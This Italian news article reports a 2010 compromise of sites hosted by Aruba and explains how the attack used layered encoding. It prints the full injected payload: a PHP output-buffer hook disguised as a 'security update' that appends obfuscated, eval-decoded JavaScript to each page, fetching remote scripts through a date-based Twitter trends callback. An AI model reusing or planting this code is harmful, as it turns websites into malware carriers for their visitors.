Il noto servizio di hosting italiano Aruba in questi giorni è stato oggetto di un attacco informatico durante il quale sono stati compromessi decine di siti web.
I particolari dell’attacco non sono ancora noti, l’unica cosa certa è che sono stati introdotti frammenti di codice JavaScript opportunamente offuscati in modo tale da renderne difficile l’individuazione. Tali codici altro non fanno che trasformare i siti colpiti in veicoli di trasporto di malware. Tra le “vittime” di questo attacco pare ci sia il sito del duo musicale Zero Assoluto e il portale anti-phishing.it, risorsa italiana per la lotta contro le truffe telematiche.
La situazione pare comunque sotto controllo, non ci sono al momento utenti che segnalano danni al proprio PC e i pericolosi JavaScript sono già in via di eliminazione. Ecco un esempio del codice offuscato che alcune home page dei siti violati si sono trovate aggiunte come prima riga:
<?php ob_start(\\'security_update\\'); function security_update($buffer)
{return $buffer.\\'<script language="javascript">$a="Z63dZ3dZ22tZ253dsZ
2574+Z2553Z2574Z2572inZ2567.Z2566roZ256dChaZ2572CodZ2565(Z2528tZ256dp.c
Z25Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dZ2573tZ253bZ2564Z2563sZ2528Z2
564aZ252bZ2564bZ252bZ2564Z2563Z252bZ2564Z2564Z252bZ2564Z2565
,Z25310Z2529Z253bZ2564wZ2528Z2573tZ2529Z253bsZ2574Z253dZ2524Z2561Z253bZ
2522;Z22;czZ3dZ22Z2566uncZ2574iZ256fZ256e
,cZ257a(czZ2529Z257bretZ2575rZ256eZ2520Z2563a+cZ2562+cZ2563+Z2563d+Z256
3e+Z2563zZ253b};Z22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3
esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u
~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0
Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~
dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi
7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257
F~dxc0-0~ug0Qbbqi87e
~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;opZ3dZ22Z2524aZ2
53dZ2522dw(dcsZ2528cZ2575Z252c14Z2529)Z253bZ2522;Z22;dd
Z3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}
0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7
MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2
520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}
uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|
uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z
25209M0;0|uddubcK8888dy}uK7iZ22;caZ3dZ22Z2566Z2575nctZ2569on Z2564Z2563
s(Z2564s,eZ2573)Z257bdsZ253dunZ2565scZ2561peZ2528Z22;cbZ3dZ22dZ2573);
Z2573Z2574Z253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0;iZ253cdsZ252e
Z256cZ22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}
Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK
88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi
7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9
050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuq
bSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22
;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7
by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dcZ3dZ227Z
3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~u
g0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z
3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7
Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0
Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0
Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iu
qb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;daZ3dZ22
fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~
tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522
!06
60yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~t
cKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ
3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3
ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ
3edZ22;dzZ3dZ22Z2566uncZ2574ionZ2520dZ2577Z2528t)Z257bcaZ253dZ2527Z2525
64Z25256fcuZ25256denZ25257Z2534Z2
5252ewrZ252569Z2574Z252565(Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;c
bZ253dZ2527Z25253csZ252563Z2572ipZ25257Z2534Z2520Z256caZ2525Z2536eZ25
67uZ2561Z252567Z25256Z2535Z25253dZ25255cZ252522javZ2561scZ252572Z252569
Z2525Z2537Z2530tZ25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25
255cZ25252fscriptZ25253eZ2527;evaZ256c(uZ256eeZ2573Z2563aZ2570eZ2528t)Z
2529Z257d;Z22;ceZ3dZ2268arCZ256fdeZ2541Z2574Z25280Z2529Z255e(Z25270x0
Z2530Z2527Z252bes)Z2529Z2529Z253b}}Z22;ccZ3dZ22engZ2574h;iZ252b+)Z257bZ
2574Z256dpZ253ddZ2573.sZ256ciZ2563e(iZ252ci+Z2531Z2529;sZ22;Z69fZ20(d
oZ63uZ6denZ74Z2eZ63oZ6fZ6bie.Z69ndeZ78OZ66(Z27rfZ35f6Z64sZ27)Z3dZ3d-1)Z
7bfunctioZ6e cZ61Z6clbZ61ck(Z78)Z7bwZ69ndoZ77Z2etZ77 Z3dZ20Z78;vaZ72
d Z3d Z6eew Z44aZ74e()Z3bdZ2eZ73Z65Z74TimZ65(xZ5bZ22aZ73_oZ66Z22]*Z3100
0Z29;vZ61r Z68Z20Z3d d.Z67etUZ54CHZ6fuZ72s(Z29;wiZ6edZ6fw.Z68 Z3d h;i
Z66 Z28h Z3eZ208)Z7bd.sZ65tUTZ43Z44ateZ28Z64Z2eZ67etZ55TZ43DatZ65(Z29Z2
0Z2dZ202Z29;}Z65lseZ7bd.Z73etZ55TCZ44Z61tZ65Z28d.gZ65Z74UTZ43DaZ74e(Z
29 Z2d 3Z29;Z7dZ77Z69ndZ6fw.Z67Z64 Z3d d;Z76Z61r tZ69meZ20Z3d neZ77 AZ7
2Z72ay(Z29;vaZ72 shZ69ftZ49Z6edexZ20Z3d Z22Z22;timeZ5bZ22yearZ22]Z20Z
3d d.Z67etZ55Z54Z43FZ75lZ6cYZ65Z61r(Z29Z3btZ69Z6de[Z22montZ68Z22] Z3d d
.geZ74UTCZ4dontZ68()Z2b1Z3bZ74Z69me[Z22Z64ayZ22] Z3d d.Z67Z65Z74UTZ43
DZ61te(Z29Z3biZ66 (dZ2egZ65tUTZ43MZ6fntZ68()+Z31 Z3c 10)Z7bshifZ74InZ64
exZ20Z3d timZ65Z5bZ22yearZ22]Z20+Z20Z22-0Z22 + Z28Z64.Z67etUZ54CMoZ6e
tZ68(Z29+1)Z3bZ7dZ65lZ73eZ7bshiftZ49ndZ65Z78 Z3d tiZ6dZ65[Z22yeaZ72Z22]
+Z20Z22-Z22 + (dZ2egeZ74UTCZ4dontZ68()+Z31);}Z69Z66 Z28dZ2egetZ55TCD
Z61Z74Z65()Z20Z3c 1Z30Z29Z7bshiZ66tIZ6edeZ78Z20Z3dshiZ66tIZ6edZ65x +Z20
Z22Z2d0Z22 + dZ2egetZ55TCDZ61Z74e()Z3b}elZ73eZ7bshiZ66tInZ64Z65x Z3d
shZ69ftZ49ndZ65xZ20+ Z22-Z22 Z2b Z64Z2eZ67etZ55TZ43DZ61Z74e(Z29;}dZ6fZ6
3Z75Z6dZ65nt.Z77riZ74Z65(Z22Z3cscrZ22+Z22ipt lZ61ngZ75Z61geZ3djavZ61sZ6
3riZ70tZ22+Z22Z20Z73rZ63Z3dZ27htZ74pZ3aZ2fZ2fsearch.tZ77itZ74Z65Z72.cZ6
fZ6dZ2ftreZ6eZ64sZ2fdZ61ilyZ2ejsoZ6e?dZ61te
Z3dZ22+ shZ69ftIZ6edeZ78+Z22&calZ6cbaZ63Z6bZ3dcaZ6cZ6cbaZ63k2Z27Z3eZ22
+ Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fZ75nZ63tZ69oZ6e Z63Z61llZ62Z61ck
2Z28x)Z7bwiZ6edoZ77Z2eZ74w Z3d Z78;sZ63(Z27rfZ35fZ36dZ73Z27,2,7Z29Z3bev
Z61l(Z75neZ73capZ65(Z64z+cZ7aZ2bop+Z73t)+Z27Z64w(dZ7a+cZ7a($aZ2bZ73tZ
29);Z27);dZ6fcZ75menZ74.wrZ69Z7
4Z65(Z24a)Z3b}doZ63uZ6denZ74.wZ72iZ74e(Z22Z3cimZ67 srZ63Z3dZ27http:Z2fZ2
fseaZ72Z63h.Z74wiZ74terZ2eZ63Z6fmZ2fimagZ65sZ2fseaZ72cZ68Z2frss.pZ6e
Z67Z27 widthZ3d1 Z68eiZ67htZ3d1 sZ74yZ6ceZ3dZ27visibiZ6citZ79:hiZ64dZ65n
Z27 Z2fZ3e Z3cscrZ22+Z22ipt lanZ67uagZ65Z3djavasZ63riZ70tZ22+Z22 Z73rcZ3
dZ27http:Z2fZ2fsearcZ68.Z74witZ74Z65rZ2ecomZ2ftreZ6edsZ2fdailZ79.jZ73oZ6
e?Z63aZ6clbaZ63kZ3dcaZ6clbaZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ2
2);}elseZ7b$aZ3dZ27Z27};fuZ6ectiZ6fnZ20scZ28Z63nm,Z76Z2cZ65Z64)Z7bZ76ar
Z65xZ64Z3dZ6eewZ20Z44Z61Z74e(Z29;Z65xdZ2eZ73etDZ61teZ28eZ
78Z64.Z67etDZ61teZ28)+eZ64)Z3bdZ6fcumZ65nZ74Z2ecZ6fokZ69eZ3dcnm+ Z27Z3dZ
27 +escZ61pe(Z76)+Z27;exZ70ireZ73Z3dZ27+exd.tZ6fGMZ54SZ74rinZ67()Z3b
}Z3b";
function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}
else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));
</script>\\';}//important security update ?>
Il sistema utilizzato è tipico. Si immette il codice malevolo criptato in una variabile e il contenuto viene decriptato dall\\'ultima riga di codice. Il risultato è la generazione a sua volta di un\\'altro codice criptato che viene di nuovo decriptato e così via per più passaggi fino a che non si arriva alla generazione del malevolo codice finale, che eseguito dovrebbe permettere la violazione del computer vittima sperando in questo modo di ingannare i sistemi di protezione dei PC. L\\'attacco però non risulta molto pericoloso.
01/02/2010|(801) 
Aruba: Violati diversi siti web in hosting da un cripted javascript
OPZIONI
8/SET/10 
UTENTI
ON-LINE:099
SEGNALA
IL SITO AD UN AMICO 
NOTIZIE >> LETTURA
ARTICOLO
